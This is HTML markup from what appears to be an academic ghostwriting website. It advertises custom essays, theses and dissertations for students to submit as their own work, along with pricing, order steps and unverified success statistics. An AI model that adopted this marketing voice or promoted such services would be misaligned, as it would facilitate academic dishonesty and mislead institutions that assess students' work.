justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-4 pb-2"> <h1 class="main-title mb-4">What Will You Get?</h1> <p class="text-muted para-desc mx-auto mb-0">We provide professional writing services to help you score straight A’s by submitting custom written assignments that mirror your guidelines. </p> </div> </div> <!--end col--> </div> <!--end row--> <div class="row"> <div class="col-lg-3 col-md-6"> <div class="features mt-5"> <i class="fas fa-gem"></i> <div class="content mt-4"> <h4 class="title-2">Premium Quality </h4> <p class="text-muted mb-0">Get result-oriented writing and never worry about grades anymore. We follow the highest quality standards to make sure that you get perfect assignments.</p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-user-edit"></i> <div class="content mt-4"> <h4 class="title-2">Experienced Writers</h4> <p class="text-muted mb-0">Our writers have experience in dealing with papers of every educational level. You can surely rely on the expertise of our qualified professionals.</p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-clock"></i> <div class="content mt-4"> <h4 class="title-2">On-Time Delivery </h4> <p class="text-muted mb-0">Your deadline is our threshold for success and we take it very seriously. We make sure you receive your papers before your predefined time. </p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-headset"></i> <div class="content mt-4"> <h4 class="title-2">24/7 Customer Support </h4> <p class="text-muted mb-0">Someone from our customer support team is always here to respond to your questions. So, hit us up if you have got any ambiguity or concern.</p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-shield-alt"></i> <div class="content mt-4"> <h4 class="title-2">Complete Confidentiality</h4> <p class="text-muted mb-0">Sit back and relax while we help you out with writing your papers. We have an ultimate policy for keeping your personal and order-related details a secret.</p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-check"></i> <div class="content mt-4"> <h4 class="title-2">Authentic Sources</h4> <p class="text-muted mb-0">We assure you that your document will be thoroughly checked for plagiarism and grammatical errors as we use highly authentic and licit sources. </p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-undo-alt"></i> <div class="content mt-4"> <h4 class="title-2">Moneyback Guarantee</h4> <p class="text-muted mb-0">Still reluctant about placing an order? Our 100% Moneyback Guarantee backs you up on rare occasions where you aren’t satisfied with the writing.</p> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-md-6 mt-5"> <div class="features"> <i class="fas fa-phone-volume"></i> <div class="content mt-4"> <h4 class="title-2">Order Tracking </h4> <p class="text-muted mb-0">You don’t have to wait for an update for hours; you can track the progress of your order any time you want. We share the status after each step.</p> </div> </div> </div> <!--end col--> </div> <!--end row--> <div class="text-center mt-5 wow bounceInUp" style="visibility: hidden; animation-name: none;"> <a href="/order" class="btn btn-primary black-btn2 mt-3 mr-sm-2">Order Now</a> <a href="javascript:void(Tawk_API.toggle())" class="btn btn-success black-btn2 mt-3 mr-sm-2 bounce-effect"><i class="fas fa-comments"></i> Talk to Us</a> </div> </div> <div class="container-fluid"> <div class="row"> <div class="home-shape-arrow"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/galuchat.png" alt="image" class="img-fluid mx-auto d-block lazyload" src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="> <a class="mouse-down"><i class="fas fa-angle-double-down arrow-icon mover text-dark"></i></a> </div> </div> </div> </section> <!-- Expertiese Section --> <!--Mobile Section--> <section class="section bg-light d-none d-sm-block" id="areas"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-4 pb-2"> <h1 class="main-title mb-4">Areas of Expertise</h1> <p class="text-muted para-desc mx-auto mb-0">Although you can leverage our expertise for any writing task, we have a knack for creating flawless papers for the following document types.</p> </div> </div> <!--end col--> </div> <!--end row--> <!--end col--> <div id="carousel1" class="carousel slide" data-ride="carousel"> <ol class="carousel-indicators custom-indi"> <li data-target="#carousel1" data-slide-to="0" class="active"></li> <li data-target="#carousel1" data-slide-to="1"></li> <li data-target="#carousel1" data-slide-to="2"></li> <li data-target="#carousel1" data-slide-to="3"></li> </ol> <div class="carousel-inner"> <div class="carousel-item active"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 col-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-1 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Essay</h4> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-2 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Thesis</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-3 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Presentation</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-4 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Dissertation</h4> </div> </div> </div> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-5 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Term Paper</h4> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-6 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Research Paper</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-7 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Book Review</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-8 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Assignment</h4> </div> </div> </div> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-9 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Report</h4> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-10 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Case Study</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-11 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Letter</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-12 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Article</h4> </div> </div> </div> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-13 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Coursework</h4> </div> </div> </div> <!--end col--> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-14 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Speech</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-15 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Q & A</h4> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature py-5 px-3 rounded shadow bg-white"> <div class="icon-16 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Critical Thinking </h4> </div> </div> </div> </div> </div> </div> <a class="carousel-control-prev" data-target="#carousel1" role="button" data-slide="prev"> <i class="fas fa-angle-left"></i> <span class="sr-only">Previous</span> </a> <a class="carousel-control-next" data-target="#carousel1" role="button" data-slide="next"> <i class="fas fa-angle-right"></i> <span class="sr-only">Next</span> </a> </div> <!--end row--> </div> <!--end container--> </section> <!--Desktop Section--> <section id="areas2" class="section bg-light d-block d-sm-none"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-4 pb-2"> <h4 class="main-title mb-4">Areas of Expertise</h4> <p class="text-muted para-desc mx-auto mb-0">Although you can leverage our expertise for any writing task, we have a knack for creating flawless papers for the following document types.</p> </div> </div> <!--end col--> </div> <!--end col--> <div id="carousel2" class="carousel slide d-block d-sm-none" data-ride="carousel"> <div class="carousel-inner"> <div class="carousel-item active"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-1 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Essay</h4> </div> </div> </div> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-2 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Thesis</h4> </div> </div> </div> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-3 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Presentation</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-4 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Dissertation</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-5 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Term Paper</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-6 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Research Paper</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-7 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Book Review</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-8 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Assignment</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-9 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Report</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-10 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Case Study</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-11 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Letter</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-12 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Article</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-13 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Coursework</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-14 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Speech</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-15 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Q & A</h4> </div> </div> </div> <!--end col--> </div> </div> <div class="carousel-item"> <div class="row text-center"> <div class="col-lg-3 col-sm-6 mt-4 pt-2"> <div class="key-feature p-5 rounded shadow bg-white"> <div class="icon-16 icon text-center rounded-pill"> </div> <div class="content mt-2"> <h4 class="title mb-0">Critical Thinking </h4> </div> </div> </div> </div> </div> </div> <a class="carousel-control-prev" data-target="#carousel2" role="button" data-slide="prev"> <i class="fas fa-angle-left"></i> <span class="sr-only">Previous</span> </a> <a class="carousel-control-next" data-target="#carousel2" role="button" data-slide="next"> <i class="fas fa-angle-right"></i> <span class="sr-only">Next</span> </a> </div> <!--end row--> </div> <!--end container--> </section> <!-- Features Section --> <section id="features" class="position-relative choose_section"> <div class="container-fluid"> <div class="row"> <div class="home-shape-arrow2"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/bilalo.png" alt="image" class="img-fluid mx-auto d-block lazyload"> </div> </div> <!--end row--> </div> <div class="home-center"> <div class="home-desc-center"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-4 pb-2"> <h1 class="main-title mt-3 mb-3"><span class="static_text">Trusted Partner of 9650+ Students for Writing</span> <span class="element text-primary" data-elements="Essays, Term Papers, Theses, Dissertations, Term Papers, Research Papers, Book Reviews, Assignments, Lab Reports, Case Studies"></span></h1> <p class="text-muted para-desc mx-auto mb-0">From brainstorming your paper's outline to perfecting its grammar, we perform every step carefully to make your paper worthy of A grade.</p> </div> </div> <!--end col--> </div> <div class="row mt-4 mx-0 pl-3 pr-4"> <div class="col-lg-6 col-md-6"> <div class="calculate-set"> <i class="fas fa-user-edit"></i> <h5>Preferred Writer </h5> <p>Hire your preferred writer anytime. Simply specify if you want your preferred expert to write your paper and we’ll make that happen.</p> </div> <div class="calculate-set"> <i class="fas fa-spell-check"></i> <h5>Grammar Check Report </h5> <p>Get an elaborate and authentic grammar check report with your work to have the grammar goodness sealed in your document.</p> </div> <div class="calculate-set"> <i class="fas fa-file-alt"></i> <h5>One Page Summary </h5> <p>You can purchase this feature if you want our writers to sum up your paper in the form of a concise and well-articulated summary.</p> </div> <div class="calculate-set"> <i class="fas fa-eye"></i> <h5>Plagiarism Report</h5> <p>You don’t have to worry about plagiarism anymore. Get a plagiarism report to certify the uniqueness of your work.</p> </div> </div> <!--end col--> <div class="col-lg-5 offset-lg-1 col-md-6"> <div id="free_plan" class="pricing-rates starter-plan free_plan shadow rounded"> <h2 class="title text-uppercase mb-4">Free Features <span class="text-center heading_tag"><span class="t_price mr-1">$66</span><span class="text-success free">FREE</span></span></h2> <ul class="feature list-unstyled pl-0"> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Most Qualified Writer <span class="text-center price_tag"><span class="single_price mr-1">$10</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Plagiarism Scan Report <span class="text-center price_tag"><span class="single_price mr-1">$10</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Unlimited Revisions <span class="text-center price_tag"><span class="single_price mr-1">$08</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Paper Formatting <span class="text-center price_tag"><span class="single_price mr-1">$05</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Cover Page <span class="text-center price_tag"><span class="single_price mr-1">$05</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Referencing & Bibliography <span class="text-center price_tag"><span class="single_price mr-1">$10</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> Dedicated User Area <span class="text-center price_tag"><span class="single_price mr-1">$08</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list"> <i class="fas fa-check text-success mr-2"></i> 24/7 Order Tracking <span class="text-center price_tag"><span class="single_price mr-1">$05</span><span class="text-white bg-primary free">FREE</span></span> </li> <li class="feature-list mb-0"> <i class="fas fa-check text-success mr-2"></i> Periodic Email Alerts <span class="text-center price_tag"><span class="single_price mr-1">$05</span><span class="text-white bg-primary free">FREE</span></span> </li> </ul> </div> </div> </div> </div> </div> </div> <!--end home center--> </section> <!-- Service Section --> <section class="services position-relative" id="service"> <div class="container-fluid d-none d-lg-block"> <div class="row"> <div class="home-shape-arrow3"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/mazing.png" alt="image" class="img-fluid mx-auto d-block lazyload"> </div> </div> <!--end row--> </div> <div class="container pt-4 pt-lg-0"> <div class="row align-items-center"> <div class="col-lg-6"> <div class="section-title"> <h4 class="title mb-4">Our Services</h4> <p class="text-muted para-desc">Join us for the best experience while seeking writing assistance in your college life. A good grade is all you need to boost up your academic excellence and we are all about it.</p> <ul class="list-unstyled feature-list text-muted"> <li><i class="fas fa-check-circle text-success mr-2"></i>On-time Delivery</li> <li><i class="fas fa-check-circle text-success mr-2"></i>24/7 Order Tracking </li> <li><i class="fas fa-check-circle text-success mr-2"></i>Access to Authentic Sources</li> </ul> </div> </div> <!--end col--> <div class="col-lg-6"> <div class="row ml-lg-5"> <div class="col-md-6 col-12"> <div class="row"> <div class="col-12 mt-4 pt-5"> <div class="flip-box fbx1"> <div class="counter-box position-relative counter-border bg-primary shadow rounded text-white"> <h5 class="counter-head">Academic Writing</h5> <p> We create perfect papers according to the guidelines. </p> </div> </div> </div> </div> </div> <div class="col-md-6 col-12"> <div class="row pt-lg-5 mt-lg-4"> <div class="col-12"> <div class="flip-box"> <div class="counter-box position-relative counter-border bg-white shadow rounded text-center"> <h5 class="counter-head">Professional Editing</h5> <p> We seamlessly edit out errors from your papers. </p> </div> </div> </div> <div class="col-12 mt-4 mobile_service"> <div class="flip-box"> <div class="counter-box position-relative counter-border bg-primary shadow rounded text-white"> <h5 class="counter-head">Thorough Proofreading</h5> <p> We thoroughly read your final draft to identify errors. </p> </div> </div> </div> <div class="col-12 pt-4 hidden-xs"> <div class="flip-box"> <div class="counter-box position-relative counter-border bg-success shadow rounded text-white"> <h5 class="counter-head">Thorough Proofreading</h5> <p>We thoroughly read your final draft to identify errors. </p> </div> </div> </div> </div> </div> </div> </div> </div> <!--end row--> </div> <div class="container-fluid"> <div class="row"> <div class="home-shape-arrow"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/synrhabdosome.png" alt="image" class="img-fluid mx-auto d-block lazyload"> <a class="mouse-down"><i class="fas fa-angle-double-down arrow-icon mover text-dark"></i></a> </div> </div> <!--end row--> </div> <!-- END CONTAINER --> </section> <!-- Service Section --> <!-- CTA Section --> <section class="bg-cta lazyload with-gradient" data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/delegate.jpg" id="cta"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title"> <h1 class="main-title text-white mb-4">Delegate Your Challenging Writing Tasks to Experienced Professionals</h1> <p class="text-light para-desc mx-auto mb-0">Work with ultimate peace of mind because we ensure that your academic work is our responsibility and your grades are a top concern for us!</p> </div> </div> <!--end col--> </div> <!--end row--> <div class="text-center mt-5 wow bounceIn bug-fix"> <a href="/order" class="btn btn-primary black-btn mt-3 mr-sm-2">Sign Up </a> <a href="javascript:void(Tawk_API.toggle())" class="btn btn-success black-btn mt-3 mr-sm-2 bounce-effect"><i class="fas fa-comments"></i> Talk to Us</a> </div> </div> <!--end container--> </section> <!-- Sample Section --> <section class="sample-section"> <div class="container"> <div class="section-title text-center mb-4"> <h1 class="main-title mb-4">Check Out Our Sample Work</h1> <p class="text-muted para-desc mb-0 mx-auto">Dedication. Quality. Commitment. Punctuality</p> </div> <section class="section-essay-samples samples-page"> <div class="essay-samples" data-type="all"> <div class="essay-samples__filter samples-filter"> <div class="samples-filter__heading">Categories</div> <div class="samples-filter__list"> <div class="samples-filter__list__item active" data-category-item="all" onclick="filterSamples('all', this, 'all')">All samples</div> <div class="samples-filter__list__item" onclick="filterSamples('other examples', this, 'essay-any-type')" data-category-item="essay-any-type">Essay (any type)</div> </div> </div> <div class="essay-samples__list samples-list"> <div class="sample show" data-category="essay-any-type" data-sample-id="3422" data-sample-title="Essay (any type)" data-paper-title="The Value of a Nursing Degree" data-academic-level="Undergrad. (yrs 3-4)" data-discipline="Nursing" data-paper-format="APA" data-sources="0" data-pages="2" data-instructions="Write a 500 to 700 words essay apa formatted essay that>1 explain your educational and professsional goals2. Explain why you want to pursue the associate degree in nursing 3. Explain how a registered nurse licence will advance your current position, include a cover page" > <div class="sample__type">Essay (any type)</div> <div class="sample__title" data-label="Paper title">The Value of a Nursing Degree</div> <div class="sample__title" data-label="Academic Level">Undergrad. (yrs 3-4)</div> <div class="sample__discipline" data-label="Discipline">Nursing</div> <div class="sample__pages" data-label="Pages">2</div> <a data-sample-light-box data-type="iframe" class="btn btn--white sample-button" data-sample-id="3422" href="https://coursescholars.com/uploads/The Value of a Nursing Degree (3).docx">View this sample </a> </div> </div> </div> </section> </div> </section> <!-- States Section --> <section class="counter bg-light position-relative"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-4 pb-2"> <h1 class="main-title mb-4">It May Not Be Much, but It’s<span class="text-primary"> Honest </span>Work!</h1> <p class="text-muted para-desc mx-auto mb-0">Here is what we have achieved so far. These numbers are evidence that we go the extra mile to make your college journey successful.</p> </div> </div> <!--end col--> </div> <!--end row--> <div class="row" id="counter"> <div class="col-md-3 col-sm-6 mt-4 pt-2"> <div class="counter-box text-center"> <i class="fas fa-smile"></i> <h2 class="mb-0 mt-3"><span class="counter-value" data-count="9650">0</span>+</h2> <h5 class="counter-head text-muted">Happy Clients</h5> </div> <!--end counter box--> </div> <div class="col-md-3 col-sm-6 mt-4 pt-2"> <div class="counter-box text-center"> <i class="fas fa-trophy"></i> <h2 class="mb-0 mt-3"><span class="counter-value" data-count="204450">0</span>+</h2> <h5 class="counter-head text-muted">Words Written This Week</h5> </div> <!--end counter box--> </div> <div class="col-md-3 col-sm-6 mt-4 pt-2"> <div class="counter-box text-center"> <i class="fas fa-suitcase"></i> <h2 class="mb-0 mt-3"><span class="counter-value" data-count="270">0</span>+</h2> <h5 class="counter-head text-muted">Ongoing Orders</h5> </div> <!--end counter box--> </div> <div class="col-md-3 col-sm-6 mt-4 pt-2"> <div class="counter-box text-center"> <i class="fas fa-tasks"></i> <h2 class="mb-0 mt-3"><span class="counter-value" data-count="98.7">0</span>%</h2> <h5 class="counter-head text-muted">Customer Satisfaction Rate</h5> </div> <!--end counter box--> </div> </div> <!--end row--> </div> <!--end container--> <div class="container-fluid"> <div class="row"> <div class="home-shape-bottom2 home-shape-bottom3"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/reactant.png" alt="image" class="img-fluid mx-auto d-block lazyload"> </div> </div> <!--end row--> </div> <!-- END CONTAINER --> </section> <!--Procss Section--> <section class="how-2" id="process"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-60"> <h1 class="main-title mb-4">Process as Fine as Brewed Coffee</h1> <p class="text-muted para-desc mb-0 mx-auto">We have the most intuitive and minimalistic process so that you can easily place an order. Just follow a few steps to unlock success.</p> </div> </div> <!--end col--> </div> <!--end row--> <div class="row tab-set"> <div class="col-lg-5 col-md-6"> <div id="London" class="tabcontent bg1 lazyload" data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/placeorder.jpg"></div> <div id="Paris" class="tabcontent bg2 lazyload" data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/chatbox.jpg"></div> <div id="Tokyo" class="tabcontent bg3 lazyload" data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/order-delivery.jpg"></div> <!-- <div id="Canada" class="tabcontent bg4 lazyload" data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/email.jpg"></div>--> </div> <!--end col--> <div class="col-lg-7 col-md-6 mt-4 mt-sm-0 pt-2 pt-sm-0"> <div class="section-title ml-lg-3"> <div class="tab custom-tab text-center"> <button class="tablinks start-tab active" onmouseover="openCity(event, 'London')"> <h4>Share Your Requirements</h4> <p>Create an account and tell us about your paper. Start a live chat or fill order form to share your paper type, deadline, number of pages, and other guidelines.</p> </button> <button class="tablinks" onmouseover="openCity(event, 'Paris')"><i class="fas fa-arrow-down"></i> <h4>Place Order & Deposit Funds</h4> <p>Confirm your order to connect with the writer who will be working on your paper. You can choose your previous writer or let us select the most suitable one.</p> </button> <button class="tablinks" onmouseover="openCity(event, 'Tokyo')"><i class="fas fa-arrow-down"></i> <h4>Release Payment to Your Writer</h4> <p>We deliver your completed paper via email and then send payment to the writer. We don't issue payment unless your paper is successfully delivered to you.</p> </button> <!-- <button class="tablinks" onmouseover="openCity(event, 'Canada')"><i class="fas fa-arrow-down"></i> Release the Payment to Your Writer</button>--> </div> </div> </div> <!--end col--> <!--end row--> </div> <!--end container--> <div class="btn-set2 text-center mt-5 wow bounceIn"> <a href="tel:+18776578180" class="btn btn-success black-btn2 mt-3 mr-sm-2 btn_tell"><i class="fas fa-phone"></i> Call Us +1 (877) 657-8180</a> <a href="javascript:void(Tawk_API.toggle())" class="btn btn-primary black-btn2 mt-3 mr-sm-2 bounce-effect"><i class="fas fa-comments"></i> Discuss Order Details Now </a> </div> </div> </section> <!-- Helped Students Section --> <section id="how-to" class="section bg-light"> <div class="container mb-3"> <div class="row justify-content-center"> <div class="col-12 text-center"> <div class="section-title mb-60"> <h1 class="main-title mb-4">See How We Helped 9000+ Students Achieve Success</h1> </div> </div> <!--end col--> </div> <div class="row align-items-center"> <div class="col-lg-6 col-md-6 text-center"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/adipous.png" class="img-fluid lazyload" alt="image"> </div> <!--end col--> <div class="col-lg-6 col-md-6 mt-4 mt-sm-0 pt-2 pt-sm-0"> <div class="section-title ml-lg-3"> <h4 class="title mb-4">We Analyze Your Problem and Offer Customized Writing </h4> <p class="text-muted">We understand your guidelines first before delivering any writing service. You can discuss your writing needs and we will have them evaluated by our dedicated team. </p> <ul class="list-unstyled feature-list text-muted"> <li><i class="fas fa-check-circle text-success mr-2"></i>Clear elicitation of your requirements.</li> <li><i class="fas fa-check-circle text-success mr-2"></i>Customized writing as per your needs.</li> </ul> </div> </div> <!--end col--> </div> <!--end row--> </div> <!--end container--> <div class="container mb-3"> <div class="row align-items-center"> <div class="col-lg-7 col-md-6 order-2 order-md-1 mt-4 mt-sm-0 pt-2 pt-sm-0"> <div class="section-title mr-lg-5"> <h4 class="title mb-4">We Mirror Your Guidelines to Deliver Quality Services</h4> <p class="text-muted">We write your papers in a standardized way. We complete your work in such a way that it turns out to be a perfect description of your guidelines. </p> <ul class="list-unstyled feature-list text-muted"> <li><i class="fas fa-check-circle text-success mr-2"></i>Proactive analysis of your writing.</li> <li><i class="fas fa-check-circle text-success mr-2"></i>Active communication to understand requirements.</li> </ul> </div> </div> <!--end col--> <div class="col-lg-5 col-md-6 order-1 order-md-2"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/parasyphilitic.png" alt="image" class="lazyload"> </div> <!--end col--> </div> <!--end row--> </div> <!--end container--> <div class="container"> <div class="row align-items-center"> <div class="col-lg-6 col-md-6 text-center"> <img data-src="https://assignmentresearchwriter.com/wp-content/themes/assignmentmavens/images/alkenna.png" class="img-fluid lazyload" alt="image"> </div> <!--end col--> <div class="col-lg-6 col-md-6 mt-4 mt-sm-0 pt-2 pt-sm-0"> <div class="section-title ml-lg-3"> <h4 class="title mb-4">We Handle Your Writing Tasks to Ensure Excellent Grades</h4> <p class="text-muted">We promise you excellent grades and academic excellence that you always longed for. Our writers stay in touch with you via email.</p> <ul class="list-unstyled feature-list text-muted"> <li><i class="fas fa-check-circle text-success mr-2"></i>Thorough research and analysis for every order.</li> <li><i class="fas fa-check-circle text-success mr-2"></i>Deliverance of reliable writing service to improve your grades.</li> </ul> </div> </div> <!--end 